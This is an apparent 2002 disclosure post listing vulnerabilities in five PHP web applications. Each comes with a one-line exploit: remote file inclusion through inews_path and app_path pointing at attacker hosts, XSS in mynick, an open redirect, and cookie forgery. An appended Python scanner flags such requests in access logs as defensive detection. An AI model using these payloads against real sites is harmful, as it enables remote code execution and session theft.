Product 1 :
***********
Achims Guestbook 2.51 (and less?)
http://www.lkcc.org:8500/index.php

Problem :
- Information Disclosure

Exploits :
- /data/*.dat (e.g. : data.dat)
- /temp/*.tmp (e.g. : ip.tmp)


Product 2 :
***********
InertiaNews 0.02 beta
http://www.brentc.com

Problem :
- Require();

Exploit :
- http://www.victim.com/inertianews_main.php?inews_path=http://www.site.com
  With http://www.site.com/inertia_sql_class.php


Product 3 :
***********
Pollen 1.4.1 (and less ?)
http://www.phpspirit.com

Problems :
- Path Disclosure
- Including file
- Distortion of the security against the multiple votes

Exploits :
- pollensondage.inc.php?app_path=non-existant-path
- Setcookie("pollensondage","")
- pollensondage.inc.php?app_path=http://www.haxor.com
  with http://www.haxor.com/admin/phpext
- etc ...


Product 4 :
***********
MyPhpChat 1
http://www.creotec.com

Problems :
- XSS
- Redirection

Exploits :
- iframe.php?mynick=<script>[SCRIPT]</script>
- userlist.php?ME=http://www.site.com
- etc...


Product 5 :
***********
mcPass 1
http://www.phpforums.net

Problem :
- Distortion of security

Exploit :
- Setcookie("mcPass","AAAAA")


More details in French :
http://www.ifrance.com/kitetoua/tuto/5holes6.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2F5holes6.txt&langpair=fr%7Cen&hl=fr&ie=UTF8&oe=UTF8&prev=%2Flanguage_tools

frog-m@n
This archive was generated by hypermail 2b30 : Mon May 27 2002 - 13:21:16 PDT
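For defenders reviewing web server logs, the following is an added example (not part of the original post or of any of the listed products) that flags requests placing a remote URL in the script parameters named in the advisory: inews_path, app_path and ME. The combined access log format, the function name and the sample entries are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameter pairs named in the advisory above.
WATCHED = {
    "inertianews_main.php": "inews_path",
    "pollensondage.inc.php": "app_path",
    "userlist.php": "ME",
}
# Request line of a combined-format access log entry (format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that names a remote resource, e.g. http://host or ftp://host.
REMOTE_RE = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.IGNORECASE)

def find_remote_url_params(log_lines):
    """Return (client, script, parameter, value) for each flagged request."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        script = target.path.rsplit("/", 1)[-1]
        param = WATCHED.get(script)
        if param is None:
            continue
        # parse_qsl percent-decodes, so http%3A%2F%2F is seen as http://
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name == param and REMOTE_RE.match(value):
                hits.append((line.split(" ", 1)[0], script, name, value))
    return hits

# Constructed sample entries; addresses and hosts are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/May/2002:13:00:01 -0700] "GET /inertianews_main.php?inews_path=http://remote.example HTTP/1.0" 200 512',
    '192.0.2.11 - - [27/May/2002:13:00:05 -0700] "GET /poll/pollensondage.inc.php?app_path=http%3A%2F%2Fremote.example HTTP/1.0" 200 730',
    '198.51.100.7 - - [27/May/2002:13:01:12 -0700] "GET /poll/pollensondage.inc.php?app_path=./pollen HTTP/1.0" 200 1840',
    '198.51.100.8 - - [27/May/2002:13:02:40 -0700] "GET /chat/userlist.php?ME=http://remote.example HTTP/1.0" 302 0',
    '198.51.100.9 - - [27/May/2002:13:03:02 -0700] "GET /index.php?page=2 HTTP/1.0" 200 4096',
]

if __name__ == "__main__":
    for hit in find_remote_url_params(SAMPLE_LOG):
        print(hit)
```

A hit shows only that the request was made; whether the script acted on the value depends on the installed version and the PHP configuration.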